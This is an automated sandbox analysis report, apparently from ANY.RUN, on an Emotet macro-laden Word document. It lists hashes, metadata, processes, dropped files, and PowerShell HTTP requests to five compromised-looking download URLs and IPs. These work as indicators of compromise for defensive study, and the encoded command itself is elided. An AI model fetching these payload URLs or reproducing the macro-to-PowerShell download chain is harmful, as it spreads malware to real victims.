File name: bf948c6a7019bf94c1e1d624d3e2dfdcd2033645fb1a7898856199fe1c961e17

Full analysis: https://app.any.run/tasks/476181e7-125b-42a5-b69e-2ac20c61e0e4
Verdict: Malicious activity
Threats: Emotet
Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: October 14, 2019, 13:06:33
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Sports & Games, Subject: Cambridgeshire, Author: Pamela Romaguera, Keywords: Fantastic, Comments: Squares, Template: Normal.dotm, Last Saved By: Freeman Parker, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Oct 11 07:39:00 2019, Last Saved Time/Date: Fri Oct 11 07:39:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 175, Security: 0
MD5: AAEEF0153572F9E3FA1CB229724CF922
SHA1: CCC24980CFFA802F8122D75FB9BE959CE1290E4C
SHA256: BF948C6A7019BF94C1E1D624D3E2DFDCD2033645FB1A7898856199FE1C961E17
SSDEEP: 3072:Xaa3bgB0eOY5CTsdAgUObYJ0m9zGAkbtO2lY2Go//6rGHsrw9sSJ6wKlutfMV:Xaa3bgBfb00dRx//MGHsrksSJ69q

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • No malicious indicators.
  • SUSPICIOUS
    • Creates files in the user directory
      • powershell.exe (PID: 3816)
    • Executed via WMI
      • powershell.exe (PID: 3816)
    • PowerShell script executed
      • powershell.exe (PID: 3816)
  • INFO
    • Creates files in the user directory
      • WINWORD.EXE (PID: 2340)
    • Reads Microsoft Office registry keys
      • WINWORD.EXE (PID: 2340)
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Runte
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 204
Paragraphs: 1
Lines: 1
Company: Mosciski - Wolff
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 175
Words: 30
Pages: 1
ModifyDate: 2019:10:11 06:39:00
CreateDate: 2019:10:11 06:39:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: Freeman Parker
Template: Normal.dotm
Comments: Squares
Keywords: Fantastic
Author: Pamela Romaguera
Subject: Cambridgeshire
Title: Sports & Games
No data.
Screenshots: not included here; all screenshots are available in the full report.
Total processes: 38
Monitored processes: 2
Malicious processes: 0
Suspicious processes: 1

Behavior graph

start, winword.exe (no specs), powershell.exe

Process information

PID: 2340
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\bf948c6a7019bf94c1e1d624d3e2dfdcd2033645fb1a7898856199fe1c961e17.doc"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 14.0.6024.1000

PID: 3816
CMD: powershell -enco <encoded command elided>
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wmiprvse.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Total events: 1 887
Read events: 1 088
Write events: 0
Delete events: 0

Modification events: No data

Executable files: 0
Suspicious files: 2
Text files: 0
Unknown types: 15

Dropped files

PID | Process | Filename | Type
2340 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA310.tmp.cvr |
MD5:
SHA256:
3816 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NUISS8BYT3V28G8MIUZX.temp |
MD5:
SHA256:
2340 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\479EC528.wmf | wmf
MD5: C05A6D1B58DCBDC99CE474C796955CF2
SHA256: BBA0E7A68F2510339998D1EDBEC5439FB6FBDA54016BAFA686C370397A18229B
2340 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F81F8C8A.wmf | wmf
MD5: B3B267AF10567AA2F63E4B21CC73D29F
SHA256: 25137D6CABCC378313E42D0F7271E131C117BA183259BF51CA78E122E80079BC
2340 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F22044F2.wmf | wmf
MD5: 8CF8BAF5D1B6A52D17BB7E527AE7916D
SHA256: CD2B6F60D4626D972A11857BAACA8903649EC4191E9A8B055BE1C30B51B68153
2340 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\431DE1D0.wmf | wmf
MD5: 834C79652706C8331818AA79077B2853
SHA256: 49095F07E813FF26F29B6AD6DCB9A45707DD1D1BD37AF80253875712F2C4F210
2340 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CC9A641C.wmf | wmf
MD5: F9031FD21DA0F51C35FBE71607F5A358
SHA256: 8692BDE0A063FDD08FB894EAE119C2C117E151A493EB3062D6EE99104A28E792
2340 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\217A385E.wmf | wmf
MD5: EBD514E9108118A7EB4523A8A700B474
SHA256: 8870C147A67425E86513DCBEE2A985B5C8BA26453A69E415FD28781E012DEECE
3816 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39aee8.TMP | binary
MD5: 35375F3D71AE42AA9777154D256B33BF
SHA256: BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
2340 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$948c6a7019bf94c1e1d624d3e2dfdcd2033645fb1a7898856199fe1c961e17.doc | pgc
MD5: E901ADB6016B736098B7C0A0C6A30515
SHA256: 25683758389B14134B507BE3A3149ED3B41FBB4FC5710EDE2A8C25FFA161EF44
HTTP(S) requests: 5
TCP/UDP connections: 5
DNS requests: 5
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
3816 | powershell.exe | GET | 404 | 185.87.187.138:80 | http://thijsmorlion.com/wp-admin/h52077/ | NL | xml | 345 b | suspicious
3816 | powershell.exe | GET | 404 | 77.104.150.127:80 | http://queeniekawabe.com/all_photos/4el75/ | US | xml | 345 b | whitelisted
3816 | powershell.exe | GET | 404 | 50.118.231.203:80 | http://yy6262.com/wordpress/h670/ | US | xml | 345 b | whitelisted
3816 | powershell.exe | GET | 404 | 103.21.58.250:80 | http://thenews4views.com/9mcmnp3/2i36/ | IN | xml | 345 b | suspicious
3816 | powershell.exe | GET | 404 | 103.95.197.8:80 | http://thegioigas.com/Login/1g98/ | VN | xml | 345 b | suspicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
3816 | powershell.exe | 103.95.197.8:80 | thegioigas.com | VIET DIGITAL TECHNOLOGY LIABILITY COMPANY | VN | suspicious
3816 | powershell.exe | 50.118.231.203:80 | yy6262.com | EGIHosting | US | suspicious
3816 | powershell.exe | 185.87.187.138:80 | thijsmorlion.com | Astralus B.V. | NL | suspicious
3816 | powershell.exe | 103.21.58.250:80 | thenews4views.com | PDR | IN | unknown
3816 | powershell.exe | 77.104.150.127:80 | queeniekawabe.com | SoftLayer Technologies Inc. | US | unknown

DNS requests

Domain | IP | Reputation
thijsmorlion.com | 185.87.187.138 | suspicious
thegioigas.com | 103.95.197.8 | suspicious
yy6262.com | 50.118.231.203 | whitelisted
thenews4views.com | 103.21.58.250 | suspicious
queeniekawabe.com | 77.104.150.127 | unknown

Threats: No threats detected
No debug info